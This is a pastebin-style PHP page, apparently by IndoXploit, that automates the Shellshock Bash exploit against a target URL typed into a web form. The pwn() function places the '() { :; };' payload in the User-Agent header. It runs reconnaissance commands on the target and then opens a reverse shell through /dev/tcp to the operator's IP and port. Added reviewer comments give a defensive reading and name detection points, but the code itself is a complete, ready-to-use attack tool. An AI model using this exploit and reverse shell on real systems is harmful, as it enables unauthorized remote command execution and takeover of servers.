AgusSR

ShellShock Auto Xploit & Reverse Shell

Jun 2nd, 2016
  1. <html>
  2. <h1>ShellShock Auto Anu by IndoXploit</h1>
  3. <form method="post">
  4. Target: <br><input type="text" name="url" style="width: 400px; margin: 10px auto; " height="10" placeholder="http://www.target.com/"><br>
  5. IP VPSmu: <br><input type="text" name="ip" style="width: 400px; margin: 10px auto; " height="10" placeholder="127.0.0.1"><br>
  6. PORT Listening: <br><input type="text" name="port" style="width: 400px; margin: 10px auto; " height="10" placeholder="1337"><br>
  7. <input type="submit" name="go" style="width: 400px; margin: 10px auto; " value="test">
  8. </form>
  9. </html>
  10. <?php
  11. // indoxploit - evoo
      // pwn(): sends one HTTP request to $site whose User-Agent header carries a
      // Shellshock-style value: the "() { :; };" function-definition prefix
      // followed by "echo; /bin/$cmd". Returns whatever curl_exec() returns:
      // the response body as a string (CURLOPT_RETURNTRANSFER is set) or false
      // when the transfer fails.
      //
      // Reviewer notes (defensive reading):
      //  - The header only has an effect when the receiving server hands request
      //    headers to an unpatched Bash as environment variables (typically a
      //    CGI handler); a patched Bash treats the value as plain data.
      //  - The prefix is a stable detection point: a request header whose value
      //    begins with "() {" in access logs or at a WAF/IDS warrants an alert.
      //  - $site and $cmd are used exactly as passed in; nothing in this
      //    function validates either one.
      //  - No timeout option is set and the curl handle is never closed here.
  12. function pwn($site,$cmd) {
  13.     $useragent =  "() { :; }; echo; /bin/$cmd"; // header value; $cmd is interpolated after the fixed "/bin/" prefix
  14.     $ch = curl_init($site); // $site comes straight from the caller
  15.           curl_setopt($ch, CURLOPT_USERAGENT, $useragent); // the crafted string replaces the User-Agent header
  16.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
  17.     $postResult = curl_exec($ch); // false on transfer failure; not checked
  18.     return $postResult;
  19. }
  20. $url = $_POST['url'];
      // Request handler: the four assignments copy the form fields from $_POST
      // without checking that they exist or validating them (a plain page load
      // with no POST body reads undefined keys). When "go" was posted, the block
      // below calls pwn() five times against $url and prints each result.
      //
      // Reviewer notes (defensive reading):
      //  - Lines 27-30 request pwd, uname -a, id and whoami; line 31 requests an
      //    interactive bash with its streams redirected to /dev/tcp/$ip/$port,
      //    i.e. an outbound TCP connection from the target to the address typed
      //    into the form. On the target side this shows up as a bash child of
      //    the web server process opening an unexpected outbound connection,
      //    which egress filtering and process/network monitoring can catch.
      //  - $ip and $port are concatenated into the command string as-is.
      //  - $url and every response body are echoed into the page without
      //    htmlspecialchars(), so this page renders whatever markup the form
      //    input or the remote server returns.
      //  - pwn() may return false; the concatenation then prints an empty string.
  21. $go = $_POST['go'];
  22. $ip = $_POST['ip'];
  23. $port = $_POST['port'];
  24. if(isset($go)) { // true only when the submit button's "go" field was posted
  25.     echo "<pre>";
  26.     echo "=> $url<br>"; // reflects the submitted URL unescaped
  27.     echo "pwd: ". pwn($url, "pwd") ."<br>";
  28.     echo "uname -a: ". pwn($url, "uname -a") . "<br>";
  29.     echo "id: ". pwn($url, "bash -c 'id'") . "<br>";
  30.     echo "whoami: ". pwn($url, "bash -c 'whoami'") . "<br>";
  31.     echo pwn($url, 'bash -i >& /dev/tcp/'.$ip.'/'.$port.' 0>&1') . "<br>"; // outbound shell to the operator-supplied $ip:$port
  32.     echo "[ auto anu selesaiii bossqq ]<br><br>"; // completion message, printed whether or not any request succeeded
  33.     echo "</pre>";
  34. }
  35. ?>